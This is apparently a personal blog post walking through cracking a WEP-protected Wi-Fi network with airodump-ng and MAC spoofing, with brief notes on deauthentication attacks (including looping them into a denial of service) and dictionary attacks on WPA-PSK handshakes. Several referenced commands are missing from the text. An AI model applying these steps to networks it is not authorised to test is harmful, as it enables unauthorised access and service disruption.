Tag Archives: Wifi

Ok, I know there are tons of docs out there on this and it has been done a million times. This is just for my personal reference. I always knew WEP was insecure, I just never did anything about it (found it boring). So on one bored night I decided to find out how long it would take to break into my MAC Filtering/ WEP 128 Bit key network. It took about 1 hour to gather all the IV’s I needed and to crack the key. So here’s how to do it.

I will usually find the network I want to attack using Kismet. Then let the fun begin.
Now we can startup airodump-ng to capture all the stuff we need.

airodump-ng -w wepcrack -c 1 wlan0

To save headaches of MAC filtering lets just spoof our MAC to a client that is already connected or one you know is allowed.
(If nobody is connected and MAC filtering is enabled, you are kind of out of luck)
ifconfig wlan0 down
ifconfig wlan0 hw ether FF:31:13:3F:44:55 (client MAC)
ifconfig wlan0 up

There much better, MAC filtering is defeated.

Ok now we are capturing the data with airodump, lets inject some traffic and generate some IV’s. In airodump the data column is the IV’s. For a 64 bit key you need around 300,000 and about 1 million for 128 bit key. But this will vary. On to the injection.

Note: If you cannot get any ARP requests, sometimes doing a de-auth on the client will sometimes generate some traffic for you. It is done like below.
(If you want to DOS the client just change the 20 to a 0, this will make it loop rather then run 20 times)

That’s it ! Key is broken. Now I will quickly go through WPA-PSK. Basically, the only way I found to attack it is a dictionary attack against the PSK.

The goal here is to capture the 4-way handshake. So do the de-auth as described above to cause the client to deauth and reconnect in hopes of catching the 4-way handshake. Sometimes this will take multiple tries to catch it. What I do is just keep on running aircrack against the active dump file to see if I got a handshake or not.
(You can also run ethereal on the file to see exactly what the handshake looks like just filter by EAPOL)

Once you got it. You can stop capturing traffic.

Now you can run aircrack with the WPA option and point it to your dictionary file. But I had troubles passing my very big dictionary file to it. So I then turned to cowpatty. Very straightforward, run it to see available options.